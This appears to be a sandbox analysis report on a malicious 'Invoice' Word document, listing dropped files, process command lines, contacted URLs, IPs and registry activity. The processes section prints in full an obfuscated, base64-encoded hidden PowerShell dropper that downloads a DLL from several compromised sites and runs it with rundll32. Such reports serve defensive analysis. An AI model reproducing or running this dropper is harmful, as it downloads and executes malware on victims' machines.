Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Invoice 6682363.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Human Awesome interface
XSS Electronics, Kids & Garden Frozen Incredible Metal Chips application hacking Baby & Health Rwanda, Author: Mara del Carmen
Yanes, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri
Jan 22 14:50:00 2021, Last Saved Time/Date: Fri Jan 22 14:51:00 2021, Number of Pages: 1, Number of Words: 4182, Number of
Characters: 23843, Security: 8
|
initial sample
|
||
C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0EA89377-30AB-4901-9D2A-3CE504568F55}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Invoice 6682363.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14
2020, mtime=Wed Aug 26 14:08:14 2020, atime=Mon Jan 25 15:21:36 2021, length=113152, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q8SLQGJ1YX7QD0RWZGCI.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$voice 6682363.doc
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgAJwAtAHcAaQAnACsAJwBmACcAKQArACgAJwBpAC0AcQAnACsAJwB6AHYAdgAnACkAKwAoACcANAAvADEAagA3ACcAKwAnAFgAJwApACsAKAAnAFoAJwArACcALwAhAHgAIAAnACkAKwAnAFsAJwArACgAJwAgACcAKwAnAHMAJwArACcAaAAgAGIAOgAvACcAKwAnAC8AZQAtACcAKQArACgAJwB3AGQAZQAnACsAJwBzACcAKwAnAGkAZwBuAC4AZQAnACsAJwB1AC8AdwAnACkAKwAoACcAbwBvACcAKwAnAGQALQAnACsAJwBzAHQAbwB2ACcAKQArACcAZQAtACcAKwAoACcAeAA3ACcAKwAnAGkAdwB3AC8AUgAnACsAJwAxAFMATQBzADEAdgAvACcAKQArACcAIQB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAoACcAaAAnACsAJwAgAGIAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAHIAJwApACsAKAAnAGUAbAAnACsAJwBhAHQAZQBkACcAKwAnAGcAcgBvAHUAJwApACsAJwBwAHQAJwArACcAZQAnACsAJwBzACcAKwAoACcAdAAuAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAE8AdQAnACkAKwAnAHIAJwArACgAJwBUAGkAJwArACcAbQBlAC8AYwB1AGwAZQAnACsAJwBUAEYAJwApACsAKAAnAGEAJwArACcAMwB2ACcAKQArACcALwAnACsAKAAnACEAJwArACcAeAAgAFsAIAAnACkAKwAoACcAcwBoACAAYgBzACcAKwAnADoAJwApACsAJwAvACcAKwAoACcALwB3AHcAJwArACcAdwAuAHMAJwApACsAKAAnAGMAaAAnACsAJwBtACcAKQArACgAJwB1AGMAawBmAGUAJwArACcAZABlAHIAJwArACcAbgAnACkAKwAoACcALgBpACcAKwAnAG4AJwApACsAJwBmACcAKwAnAG8AJwArACgAJwAvACcAKwAnAHIAZQBmAGUAJwArACcAcgAnACkAKwAnAGUAbgAnACsAKAAnAGMAZQAnACsAJwAvADAASAAnACkAKwAoACcAbABCAEIAJwArACcAZwAnACkAKwAnADgAJwArACcALwAnACkALgAiAHIAZQBwAGAATABhAEMAZQAiACgAKAAoACcAeAAgAFsAJwArACcAIAAnACkAKwAoACcAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAUAB6AHAAeAB0ADAAbgAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABsAGkAdAAiACgAJABFADIAMwBSACAAKwAgACQAWABsAHoAaQBvADkAagAgACsAIAAkAFYANAA2AEIAKQA7ACQAQQAzAF8AVAA9ACgAJwBEACcAKwAoACcANAAnACsAJwAyAEIAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAANgBtADAAbQBxAGoAIABpAG4AIAAkAEwANQBiAHIAZAB3AGYAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAJwArACcAdwAtAE8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAFMAWQBzAFQARQBtAC4ATgBFAHQALgB3AEUAQgBjAEwAaQBlAG4AdAApAC4AIgBkAGAAbwBXAGAATgBMAE8AQQBgAEQAZgBJAGwARQAiACgAJABQADYAbQAwAG0AcQBqACwAIAAkAFIAegBtAG4AcABxAHMAKQA7ACQAVAA3ADMAVAA9ACgAKAAnAEUAMgAnACsAJwA3ACcAKQArACcASgAnACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAUgB6AG0AbgBwAHEAcwApAC4AIgBsAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADQAMgAxADMAMgApACAAewAmACgAJwByAHUAJwArACcAbgBkACcAKwAnAGwAbAAzADIAJwApACAAJABSAHoAbQBuAHAAcQBzACwAKAAoACcAQQAnACsAJwBuAHkAJwApACsAKAAnAFMAdAByAGkAJwArACcAbgAnACkAKwAnAGcAJwApAC4AIgBUAGAAbwBzAHQAUgBgAEkAbgBnACIAKAApADsAJABMADUAMwBBAD0AKAAnAEIAJwArACgAJwA0ACcAKwAnADUAWQAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA3ADcAVAA9ACgAJwBPADgAJwArACcANABNACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwAwADYARwA9ACgAKAAnAFkAJwArACcANQAxACcAKQArACcAVQAnACkA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQANgAnACkAKwAnAFYAJwApADsAIAAoACAASQBUAEUAbQAgACAAVgBhAFIAaQBBAGIAbABlADoAMwBXAHYAKQAuAFYAQQBMAFUAZQA6ADoAIgBTAGAAZQBDAGAAVQBSAEkAYABUAHkAcAByAG8AVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAXwBPAD0AKAAoACcAUgAnACsAJwA3ADcAJwApACsAJwBBACcAKQA7ACQASQBmAHcAcwAyAHEAaQAgAD0AIAAoACcAUAA0ACcAKwAnADQARwAnACkAOwAkAFgAMwAxAEoAPQAoACcAQgAnACsAKAAnADUAJwArACcAOABSACcAKQApADsAJABSAHoAbQBuAHAAcQBzAD0AJABIAE8ATQBFACsAKAAoACcAewAnACsAJwAwAH0ATgBkAGMAegBxACcAKwAnAHkAYgB7ADAAfQBIACcAKwAoACcAYQAnACsAJwBmADAAJwApACsAJwBfAHkAbgB7ACcAKwAnADAAJwArACcAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAGYAdwBzADIAcQBpACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADYANQBBAD0AKAAnAEgAJwArACgAJwBfACcAKwAnADAAWAAnACkAKQA7ACQAUAB6AHAAeAB0ADAAbgA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEwANQBiAHIAZAB3AGYAPQAoACgAJwB4ACcAKwAnACAAWwAgAHMAaAAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAJwBtACcAKwAnAGkAJwArACcAYwByACcAKwAnAG8AJwArACcAbgBlACcAKwAnAHcAcwAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAYwAnACsAJwByAGEAbgBrAHMAaAAnACkAKwAnAGEAZgAnACsAKAAnAHQALQAnACsAJwBwAHUAbABsAGUAeQAnACsAJwAtAGkANQBhACcAKwAnAGkAbwAvAFQAbABwAC8AJwApACsAJwAhAHgAJwArACgAJwAgAFsAIABzACcAKwAnAGgAIAAnACkAKwAnAGIAJwArACcAOgAnACsAJwAvACcAKwAoACcALwBvACcAKwAnAGYAZQAnACkAKwAoACcAcgB0AC0AJwArACcAYQAnACsAJwBsAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACsAJwAtAGMAJwArACgAJwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAHQAJwArACcAOQBoAFYAJwApACsAJwBWAGkAJwArACcAQgAnACsAKAAnAGQAZQAvACEAJwArACcAeAAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAYgA6AC8ALwAnACsAJwB0AHIAJwArACcAYQAnACsAJwBuAHMAYQBsACcAKQArACgAJwAuACcAKwAnAGUAdQAvACcAKQArACcAbgBlACcAKwAoACcAdABnACcAKwAnAGUAYQByACcAKQArACgAJwAtAHcAaQAnACsAJwBmACcAKQArACgAJwBpAC0AcQAnACsAJwB6AHYAdgAnACkAKwAoACcANAAvADEAagA3ACcAKwAnAFgAJwApACsAKAAnAFoAJwArACcALwAhAHgAIAAnACkAKwAnAFsAJwArACgAJwAgACcAKwAnAHMAJwArACcAaAAgAGIAOgAvACcAKwAnAC8AZQAtACcAKQArACgAJwB3AGQAZQAnACsAJwBzACcAKwAnAGkAZwBuAC4AZQAnACsAJwB1AC8AdwAnACkAKwAoACcAbwBvACcAKwAnAGQALQAnACsAJwBzAHQAbwB2ACcAKQArACcAZQAtACcAKwAoACcAeAA3ACcAKwAnAGkAdwB3AC8AUgAnACsAJwAxAFMATQBzADEAdgAvACcAKQArACcAIQB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAoACcAaAAnACsAJwAgAGIAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAHIAJwApACsAKAAnAGUAbAAnACsAJwBhAHQAZQBkACcAKwAnAGcAcgBvAHUAJwApACsAJwBwAHQAJwArACcAZQAnACsAJwBzACcAKwAoACcAdAAuAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAE8AdQAnACkAKwAnAHIAJwArACgAJwBUAGkAJwArACcAbQBlAC8AYwB1AGwAZQAnACsAJwBUAEYAJwApACsAKAAnAGEAJwArACcAMwB2ACcAKQArACcALwAnACsAKAAnACEAJwArACcAeAAgAFsAIAAnACkAKwAoACcAcwBoACAAYgBzACcAKwAnADoAJwApACsAJwAvACcAKwAoACcALwB3AHcAJwArACcAdwAuAHMAJwApACsAKAAnAGMAaAAnACsAJwBtACcAKQArACgAJwB1AGMAawBmAGUAJwArACcAZABlAHIAJwArACcAbgAnACkAKwAoACcALgBpACcAKwAnAG4AJwApACsAJwBmACcAKwAnAG8AJwArACgAJwAvACcAKwAnAHIAZQBmAGUAJwArACcAcgAnACkAKwAnAGUAbgAnACsAKAAnAGMAZQAnACsAJwAvADAASAAnACkAKwAoACcAbABCAEIAJwArACcAZwAnACkAKwAnADgAJwArACcALwAnACkALgAiAHIAZQBwAGAATABhAEMAZQAiACgAKAAoACcAeAAgAFsAJwArACcAIAAnACkAKwAoACcAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAUAB6AHAAeAB0ADAAbgAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABsAGkAdAAiACgAJABFADIAMwBSACAAKwAgACQAWABsAHoAaQBvADkAagAgACsAIAAkAFYANAA2AEIAKQA7ACQAQQAzAF8AVAA9ACgAJwBEACcAKwAoACcANAAnACsAJwAyAEIAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAANgBtADAAbQBxAGoAIABpAG4AIAAkAEwANQBiAHIAZAB3AGYAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAJwArACcAdwAtAE8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAFMAWQBzAFQARQBtAC4ATgBFAHQALgB3AEUAQgBjAEwAaQBlAG4AdAApAC4AIgBkAGAAbwBXAGAATgBMAE8AQQBgAEQAZgBJAGwARQAiACgAJABQADYAbQAwAG0AcQBqACwAIAAkAFIAegBtAG4AcABxAHMAKQA7ACQAVAA3ADMAVAA9ACgAKAAnAEUAMgAnACsAJwA3ACcAKQArACcASgAnACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAUgB6AG0AbgBwAHEAcwApAC4AIgBsAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADQAMgAxADMAMgApACAAewAmACgAJwByAHUAJwArACcAbgBkACcAKwAnAGwAbAAzADIAJwApACAAJABSAHoAbQBuAHAAcQBzACwAKAAoACcAQQAnACsAJwBuAHkAJwApACsAKAAnAFMAdAByAGkAJwArACcAbgAnACkAKwAnAGcAJwApAC4AIgBUAGAAbwBzAHQAUgBgAEkAbgBnACIAKAApADsAJABMADUAMwBBAD0AKAAnAEIAJwArACgAJwA0ACcAKwAnADUAWQAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA3ADcAVAA9ACgAJwBPADgAJwArACcANABNACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwAwADYARwA9ACgAKAAnAFkAJwArACcANQAxACcAKQArACcAVQAnACkA
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',YWTgmybfjbBtvDQ
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',ItLugJX
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',IJPmPuzefT
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',PUIhDyBaYh
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',MWkJrCwEVqm
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',#1
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
There are 7 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://micronews.eu/crankshaft-pulley-i5aio/Tlp/
|
93.119.104.27
|
||
http://190.55.186.229/zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/
|
190.55.186.229
|
||
http://transal.eu/netgear-wifi-qzvv4/1j7XZ/
|
unknown
|
||
http://ofert-al.com
|
unknown
|
||
http://relatedgrouptest.com/OurTime/culeTFa3v/
|
unknown
|
||
http://micronews.eu
|
unknown
|
||
https://www.schmuckfedern.info/reference/0HlBBg8/
|
unknown
|
||
http://e-wdesign.eu/wood-stove-x7iww/R1SMs1v/
|
unknown
|
||
http://ofert-al.com/wp-content/t9hVViBde/
|
93.119.104.27
|
||
https://www.schmuckfedern.info/reference/0HlBBg8/P
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
https://micronews.eu/2021/01/24/hello-world/#comment-1
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
https://api.w.org/
|
unknown
|
||
https://micronews.eu/feed/
|
unknown
|
||
http://micronews.eu/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.1
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.hotmail.com/oe
|
unknown
|
||
https://micronews.eu/
|
unknown
|
||
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
||
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
|
unknown
|
||
http://micronews.eu/wp-includes/css/dist/block-library/theme.min.css?ver=5.6
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
https://micronews.eu/2021/01/24/hello-world/
|
unknown
|
||
https://wordpress.org/
|
unknown
|
||
https://micronews.eu/wp-json/
|
unknown
|
||
http://micronews.eu/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.1
|
unknown
|
||
https://micronews.eu/comments/feed/
|
unknown
|
||
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
|
unknown
|
||
http://micronews.eu/wp-content/themes/twentytwentyone/style.css?ver=1.1
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
http://micronews.eu/wp-includes/js/wp-embed.min.js?ver=5.6
|
unknown
|
||
http://micronews.eu/wp-includes/wlwmanifest.xml
|
unknown
|
||
http://micronews.eu/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.1
|
unknown
|
||
https://sectigo.com/CPS0D
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
http://micronews.eu/wp-includes/css/dist/block-library/style.min.css?ver=5.6
|
unknown
|
||
https://micronews.eu/xmlrpc.php?rsd
|
unknown
|
There are 31 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
ofert-al.com
|
93.119.104.27
|
||
micronews.eu
|
93.119.104.27
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
190.55.186.229
|
unknown
|
Argentina
|
unknown
|
||
93.119.104.27
|
unknown
|
Romania
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
g;7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
p<7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
(>7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ECF31
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
